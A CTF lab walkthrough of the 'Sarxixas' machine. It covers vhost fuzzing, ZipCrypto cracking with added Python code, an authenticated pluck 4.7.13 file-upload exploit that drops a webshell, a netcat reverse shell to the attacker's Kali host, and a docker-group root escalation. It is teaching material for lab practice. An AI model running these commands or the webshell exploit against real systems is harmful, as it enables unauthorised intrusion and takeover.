TheHackersLabs - Sarxixas: machine walkthrough (WP)
Author: 城南花已开

Information gathering

Service discovery

ARP-scan the local segment first; the 08:00:27 (Oracle VirtualBox) MAC prefix singles the target out from the VMware-owned 00:50:56 addresses. Then port-scan it with rustscan, which hands the open ports to nmap:

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.144 08:00:27:18:5a:d3 (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 4 responded
export ip=192.168.60.144
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.144:22
Open 192.168.60.144:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 13:03 CST
Initiating ARP Ping Scan at 13:03
Scanning 192.168.60.144 [1 port]
Completed ARP Ping Scan at 13:03, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:03
Completed Parallel DNS resolution of 1 host. at 13:03, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:03
Scanning 192.168.60.144 [2 ports]
Discovered open port 80/tcp on 192.168.60.144
Discovered open port 22/tcp on 192.168.60.144
Completed SYN Stealth Scan at 13:03, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.144
Host is up, received arp-response (0.00035s latency).
Scanned at 2025-01-08 13:03:46 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:18:5A:D3 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

Open the site in a browser. There is a link to the admin page in the bottom-right corner, and the footer gives the version: pluck 4.7.13.

Before going further, map the IP to the site's hostname in /etc/hosts (192.168.60.144 sarxixas.thl). The login page can also be fetched directly by IP; it confirms the version string and shows that pluck's login form takes a password only, no username:

```
sudo vim /etc/hosts
❯ curl 192.168.60.144/login.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>pluck 4.7.13 - entrar</title>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<link href="data/styleadmin.css" rel="stylesheet" type="text/css" media="screen" /><link rel="icon" type="image/vnd.microsoft.icon" href="data/image/favicon.ico" />
<meta name="robots" content="noindex" />
<script type="text/javascript">
function refresh() {
window.location.reload(false);
}
</script>
</head>

<body>
<div id="menuheader">
<h1>pluck</h1>
<ul id="menu2">
<li>entrar</li>
</ul>
</div>
<div id="content"> <span class="kop2">contraseña</span>
<form action="" method="post">
<input name="cont1" size="25" type="password" />
<input type="text" name="bogus" style="display: none;" />
<input type="submit" name="submit" value="Entrar" />
</form>
<div id="copyright"><a href="http://www.pluck-cms.org" target="_blank">pluck 4.7.13</a> © 2005-2025. pluck se ofrece bajo los términos de <a href="http://www.gnu.org/licenses/gpl.html" target="_blank">GNU Licencia Pública General</a>.</div>
</div>
</body>
</html>
```

Fuzzing virtual hosts

Use wfuzz to brute-force virtual hosts by substituting the Host header: every request goes to the same IP, only the Host value changes. `--hc 302` hides the response the server gives for hostnames it does not serve, which here is a redirect; if the default vhost answers 200 or 400 instead, filter on the baseline response size (`--hh`) or word count (`--hw`) rather than on a status code. The directory wordlist works only because "api" sits near its top (request 984 of 207643); a DNS wordlist such as SecLists' Discovery/DNS/subdomains-top1million-5000.txt is the usual choice for this job.

An api virtual host turns up:

```
❯ wfuzz -c -u "http://sarxixas.thl" -H "HOST:FUZZ.sarxixas.thl" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hc 302
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://sarxixas.thl/
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

(400 responses omitted …)
000000984: 200 15 L 51 W 776 Ch "api - api"
```
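A minimal version of what the wfuzz command above does, as an added example that is not part of the original write-up or of wfuzz itself: requests go to one IP with a varying Host header, and a candidate counts as a hit only when its response differs from a baseline measured with a hostname nobody serves, rather than when it avoids one hard-coded status code. The `fake_target` responder (an empty 302 for unknown hosts, a 776-byte 200 for api) is constructed to mirror the output above; `http_probe` is what you would pass in against the live box.

```python
import http.client
from typing import Callable, Iterable, List, Tuple

# (status code, body length) is normally enough to tell a served vhost from the default one.
Signature = Tuple[int, int]
DOMAIN = "sarxixas.thl"


def http_probe(ip: str, port: int, host: str, path: str = "/", timeout: float = 5.0) -> Signature:
    """One GET to ip:port with an arbitrary Host header (what wfuzz -H "Host: FUZZ.domain" sends)."""
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": host})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def vhost_fuzz(probe: Callable[[str], Signature], domain: str,
               words: Iterable[str]) -> List[Tuple[str, Signature]]:
    """Return (word, signature) for every candidate whose response differs from the
    baseline, i.e. what the server answers for a Host it does not serve. Measuring
    the baseline instead of hard-coding --hc 302 also works when the default vhost
    answers 200 or 400, and still flags a 302 whose body differs from the default."""
    baseline = probe(f"vhost-baseline-check.{domain}")   # a name nobody configured
    hits = []
    for word in words:
        sig = probe(f"{word}.{domain}")
        if sig != baseline:
            hits.append((word, sig))
    return hits


def fake_target(host: str) -> Signature:
    """Constructed stand-in for 192.168.60.144: unknown Hosts get an empty 302 to the
    main site; api.<domain> serves the 776-byte listing seen in the wfuzz output."""
    if host == f"api.{DOMAIN}":
        return 200, 776
    return 302, 0


def run_demo(words: Iterable[str] = ("www", "mail", "dev", "api", "test")) -> List[Tuple[str, Signature]]:
    return vhost_fuzz(fake_target, DOMAIN, words)


if __name__ == "__main__":
    for word, (status, size) in run_demo():
        print(f"{word}.{DOMAIN}  {status}  {size} bytes")
    # Against the live box (not run here):
    # vhost_fuzz(lambda h: http_probe("192.168.60.144", 80, h), DOMAIN, open("wordlist.txt").read().split())
```

The signature deliberately ignores headers and body content; if the default vhost varies its body (timestamps, CSRF tokens), widen the baseline to a set of observed signatures or compare line counts as wfuzz does with `--hl`.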

Add api.sarxixas.thl to /etc/hosts as well.

Browsing to it shows a zip archive, HostiaPilotes.zip; download it.

The archive is password-protected. zip2john reports `PKZIP Encr`, i.e. the legacy ZipCrypto scheme, which is fast to attack by dictionary; the `HostiaPilotes/ is not encrypted` line is only the directory entry and is expected. Run the hash through john with rockyou:

```
cd Downloads
ls
Cocineros hash HostiaPilotes.zip
❯ zip2john HostiaPilotes.zip >hash
ver 1.0 HostiaPilotes.zip/HostiaPilotes/ is not encrypted, or stored with non-handled compression type
ver 1.0 efh 5455 efh 7875 HostiaPilotes.zip/HostiaPilotes/contraseña.txt PKZIP Encr: 2b chk, TS_chk, cmplen=31, decmplen=19, crc=DF1DBE40 ts=69C0 cs=69c0 type=0
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
babybaby (HostiaPilotes.zip/HostiaPilotes/contraseña.txt)
1g 0:00:00:00 DONE (2025-01-08 14:04) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Extract it with the cracked password babybaby:

```
❯ unzip HostiaPilotes.zip
Archive: HostiaPilotes.zip
creating: HostiaPilotes/
[HostiaPilotes.zip] HostiaPilotes/contraseña.txt password:
password incorrect--reenter:
extracting: HostiaPilotes/contraseña.txt
cat HostiaPilotes/contraseña.txt
ElAbueloDeLaAnitta
```
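Both zip cracks on this page are dictionary attacks on ZipCrypto, the legacy PKZIP cipher that zip2john labels `PKZIP Encr`. The block below is an added example, not the write-up's commands or john's code: it implements the cipher, builds a one-entry encrypted archive in memory (the entry name, its content and the 11 random header bytes are constructed; the password babybaby is the one john recovered above), then cracks it the way zip2john/john do, with a cheap 12-byte header check per candidate and a full decrypt plus CRC-32 verification for the survivors. The header check byte alone lets roughly 1 in 256 wrong passwords through, which is why the second stage exists.

```python
import io
import os
import struct
import zipfile
import zlib
from typing import Iterable, Optional, Tuple

# CRC-32 table (same polynomial as the file CRC); the ZipCrypto key schedule uses it too.
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


class ZipCrypto:
    """Traditional PKWARE stream cipher: three 32-bit keys seeded byte-by-byte from the
    password; every plaintext byte processed also advances the keys."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        self.k0 = (self.k0 >> 8) ^ _CRC_TABLE[(self.k0 ^ b) & 0xFF]
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ _CRC_TABLE[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def build_encrypted_zip(name: bytes, plaintext: bytes, password: bytes) -> bytes:
    """Hand-written one-entry archive, STORED + ZipCrypto, laid out as a zip tool would."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes, then the CRC high byte. That last byte
    # is the only password check an extractor has before decrypting the whole entry.
    header = os.urandom(11) + bytes([crc >> 24])
    body = ZipCrypto(password).encrypt(header + plaintext)
    flags, method, dos_time, dos_date = 0x0001, 0, 12 << 11, (44 << 9) | (4 << 5) | 30
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, method, dos_time, dos_date,
                        crc, len(body), len(plaintext), len(name), 0) + name
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, method, dos_time,
                          dos_date, crc, len(body), len(plaintext), len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def crack_zipcrypto(zip_bytes: bytes, wordlist: Iterable[bytes]) -> Tuple[Optional[bytes], Optional[bytes], int]:
    """Dictionary attack on the first entry. Returns (password, plaintext, number of
    candidates that passed the cheap header check before CRC-32 verification)."""
    zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    info = zf.infolist()[0]
    if not info.flag_bits & 0x1:
        raise ValueError(f"{info.filename} is not encrypted")
    off = info.header_offset
    flags, _method, dos_time = struct.unpack_from("<HHH", zip_bytes, off + 6)
    name_len, extra_len = struct.unpack_from("<HH", zip_bytes, off + 26)
    enc_header = zip_bytes[off + 30 + name_len + extra_len:][:12]
    # With flag bit 3 the CRC was unknown when the header was written, so the check
    # byte is the high byte of the DOS mod time instead (the data-descriptor case).
    check = (dos_time >> 8) & 0xFF if flags & 0x8 else (info.CRC >> 24) & 0xFF
    survivors = 0
    for pw in wordlist:
        if ZipCrypto(pw).decrypt(enc_header)[11] != check:
            continue                       # 255/256 of wrong passwords stop here, cheaply
        survivors += 1
        try:
            with zf.open(info, pwd=pw) as fh:
                data = fh.read()           # zipfile verifies the CRC-32 at end of entry
        except (RuntimeError, zipfile.BadZipFile):
            continue                       # the check byte matched by chance
        return pw, data, survivors
    return None, None, survivors


def stdlib_extract(zip_bytes: bytes, name: str, password: bytes) -> bytes:
    """Cross-check: Python's own ZipCrypto implementation must agree with ours."""
    return zipfile.ZipFile(io.BytesIO(zip_bytes)).read(name, pwd=password)


# Constructed sample: a stand-in for HostiaPilotes/contraseña.txt and a tiny rockyou slice.
SAMPLE_ZIP = build_encrypted_zip(b"contrasena.txt", b"ElAbueloDeLaAnitta\n", b"babybaby")
WORDLIST = [b"123456", b"password", b"qwerty", b"cassandra", b"babybaby", b"whitetiger"]

if __name__ == "__main__":
    print(crack_zipcrypto(SAMPLE_ZIP, WORDLIST))
```

The keys depend only on the password, so the 12-byte check costs a few dozen table lookups per candidate; that is what lets john report hundreds of thousands of candidates per second here. AES-encrypted zips (WinZip AE-2, `-e` in 7z) use PBKDF2 and are not covered by this code or by `zip2john`'s PKZIP mode.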

Log in to the CMS with the password ElAbueloDeLaAnitta (pluck's login form has only the password field, cont1 in the HTML above).

Exploiting the PoC

A quick search shows that pluck 4.7.13 has an authenticated file-upload remote code execution vulnerability; the Exploit-DB script 49909.py automates it, taking the target, port, admin password and web path of the pluck installation as arguments (the "/" path is why the resulting URL contains a double slash). The payload is uploaded as a .phar file: pluck's upload filter rejects .php, while the stock Debian/Ubuntu Apache PHP handler (`FilesMatch ".+\.ph(ar|p|tml)$"`) still executes .phar.

Run the script:

```
❯ python3 49909.py 192.168.60.144 80 ElAbueloDeLaAnitta /

Authentification was succesfull, uploading webshell

Uploaded Webshell to: http://192.168.60.144:80//files/shell.phar
```

Browse to the webshell. The PoC's payload is p0wny@shell, which gives a terminal-like page in the browser.

User privilege escalation

Throw a reverse shell back to Kali for a more usable session: from the p0wny shell, `nc -c sh` runs sh and attaches it to the connection, and pwncat-cs on the listener side upgrades it to a proper shell.

There is an archive in /opt; download it:

```
p0wny@shell:…/html/files# nc -c sh 192.168.60.100 4444
--------- (attacker side, Kali) ---------
❯ pwncat-cs -lp 4444
[14:12:56] Welcome to pwncat 🐈! __main__.py:164
[14:13:02] received connection from 192.168.60.144:34018 bind.py:84
[14:13:03] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[14:13:04] 192.168.60.144:34018: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@sarxixas:/var/www/html/files$
(remote) www-data@sarxixas:/opt$
(local) pwncat$ download edropedropedrooo.zip
edropedropedrooo.zip ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 242/242 bytes • ? • 0:00:00
[14:14:14] downloaded 242.00B in 0.15 seconds
```

No need to even open the archive; it is obviously encrypted too. john cracks it the same way and gives the password cassandra:

```
❯ zip2john edropedropedrooo.zip >hash
ver 1.0 efh 5455 efh 7875 edropedropedrooo.zip/pedropedropedrooo.txt PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=D30B822E ts=8F24 cs=8f24 type=0
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cassandra (edropedropedrooo.zip/pedropedropedrooo.txt)
1g 0:00:00:00 DONE (2025-01-08 14:15) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ unzip edropedropedrooo.zip
Archive: edropedropedrooo.zip
[edropedropedrooo.zip] pedropedropedrooo.txt password:
extracting: pedropedropedrooo.txt
cat pedropedropedrooo.txt
3HBRD7XyxF5gAbkMmnWdW
```

The extracted text file is presumably the password of the user sarxixa.

Trying it over SSH fails:

```
❯ pwncat-cs  sarxixa@192.168.60.144
[14:17:17] Welcome to pwncat 🐈! __main__.py:164
Password: *********************
[14:17:26] connection failed: ssh authentication failed: Authentication failed.
```

The string looks a bit like Base64, but not quite: it is 21 characters long, which no Base64 string can be (padded lengths are multiples of 4, unpadded ones are never 4k+1), and it contains no +, / or =.

Pasting it into CyberChef identifies it as Base58, the encoding that uses the 58 unambiguous alphanumerics (no 0, O, I or l).

Decoding gives a new password: Quepasaolvidona

Damn, it still doesn't work. 😅

I checked other people's write-ups and found a small detail:

the archive is named edropedropedrooo.zip while the file inside it is pedropedropedrooo.txt,

and the two differ only by the leading p.

The password was hidden the same way: drop the leading Q and the real password is uepasaolvidona.
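To make the "looks like Base64 but isn't" step reproducible without CyberChef, here is an added example (not from the write-up): a Bitcoin-alphabet Base58 codec plus a small triage function that lists which text encodings a string's alphabet and length are consistent with. The string decoded is the one from pedropedropedrooo.txt; the filename-hint step is just dropping the first character.

```python
import re
from typing import List

# Bitcoin-style Base58 alphabet (CyberChef's default): digits and letters minus 0, O, I, l.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_B58_INDEX = {c: i for i, c in enumerate(B58_ALPHABET)}


def b58decode(s: str) -> bytes:
    """Base58 is a big-endian number in base 58; leading '1' digits encode leading zero bytes."""
    n = 0
    for ch in s:
        if ch not in _B58_INDEX:
            raise ValueError(f"not a Base58 character: {ch!r}")
        n = n * 58 + _B58_INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    zeros = len(s) - len(s.lstrip("1"))
    return b"\x00" * zeros + body


def b58encode(data: bytes) -> str:
    n = int.from_bytes(data, "big")
    digits = []
    while n:
        n, r = divmod(n, 58)
        digits.append(B58_ALPHABET[r])
    zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * zeros + "".join(reversed(digits))


def candidate_encodings(s: str) -> List[str]:
    """Which of hex / Base64 / Base58 could have produced s? Only the alphabet and the
    length arithmetic are checked, so several answers are possible; an empty list rules
    all three out."""
    found = []
    if re.fullmatch(r"[0-9a-fA-F]+", s) and len(s) % 2 == 0:
        found.append("hex")
    # Base64: alphabet A-Za-z0-9+/, optional '=' padding up to a multiple of 4; without
    # padding the length is never 4k+1 (a single leftover sextet cannot encode a byte).
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        if len(s) % 4 == 0 or ("=" not in s and len(s) % 4 != 1):
            found.append("base64")
    if s and all(ch in _B58_INDEX for ch in s):
        found.append("base58")
    return found


if __name__ == "__main__":
    blob = "3HBRD7XyxF5gAbkMmnWdW"           # content of pedropedropedrooo.txt
    print(candidate_encodings(blob))       # only base58 fits: length 21 rules Base64 out
    decoded = b58decode(blob).decode()
    print(decoded, "->", decoded[1:])      # the filename hint: drop the leading character
```

A string such as deadbeef satisfies all three checks, so treat the list as "worth trying" rather than a verdict; the decoded bytes being printable is the real confirmation.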

```
❯ pwncat-cs  sarxixa@192.168.60.144
[14:24:22] Welcome to pwncat 🐈! __main__.py:164
Password: **************
[14:24:29] 192.168.60.144:22: normalizing shell path manager.py:957
192.168.60.144:22: registered new host w/ db manager.py:957
(local) pwncat$

(remote) sarxixa@sarxixas:/home/sarxixa$ cat user.txt
cat: user.txt: Permiso denegado
(remote) sarxixa@sarxixas:/home/sarxixa$ ls -al
total 28
drwx------ 3 sarxixa sarxixa 4096 abr 30 2024 .
drwxr-xr-x 3 root root 4096 abr 30 2024 ..
lrwxrwxrwx 1 root root 9 abr 30 2024 .bash_history -> /dev/null
-rw-r--r-- 1 sarxixa sarxixa 220 abr 12 2024 .bash_logout
-rw-r--r-- 1 sarxixa sarxixa 3526 abr 12 2024 .bashrc
drwxr-xr-x 3 sarxixa sarxixa 4096 abr 30 2024 .local
-rw-r--r-- 1 sarxixa sarxixa 807 abr 12 2024 .profile
-r-------- 1 root root 33 abr 30 2024 user.txt
(remote) sarxixa@sarxixas:/home/sarxixa$ sudo -l
-bash: sudo: orden no encontrada
(remote) sarxixa@sarxixas:/home/sarxixa$ getcap -r /
/usr/bin/ping cap_net_raw=ep
```

user.txt is root-owned with mode 0400, so the user cannot read it; sudo is not even installed, and the only file capability is cap_net_raw on ping, which is the default and of no use.

Root privilege escalation

The user is in the docker group:

```
(remote) sarxixa@sarxixas:/home/sarxixa$ cat /etc/group
root:x:0:
(… omitted …)
docker:x:1001:sarxixa
sarxixa:x:1002:
```

Membership of the docker group is equivalent to root: the Docker daemon runs as root and will bind-mount the host's / into a container on request. Start a container with the host root mounted at /mnt and chroot into it; the resulting shell is root on the host, and both flags can be read from there (the group names in the `id` output are resolved from the host's /etc/group because of the chroot):

```
(remote) sarxixa@sarxixas:/home/sarxixa$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
245043d9199c: Pull complete
Digest: sha256:b97e2a89d0b9e4011bb88c02ddf01c544b8c781acf1f4d559e7c8f12f1047ac3
Status: Downloaded newer image for alpine:latest
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/root.txt
e84b0c633b9749b00eace3483a09c49c
# cat /home/sarxixa/user.txt
d7a4cf4ac8cbabd2adcfde5b883ecf06
```

In my previous network setup this would not have worked: the VM had no outbound access and Docker Hub was unreachable. Now, with clash in TUN mode, the pull is quick. 🛫

On an air-gapped target the pull step is unnecessary anyway: `docker images` lists the images already present on the host, and any of them can replace alpine in the command above, since `docker run` only pulls when the image is missing locally.
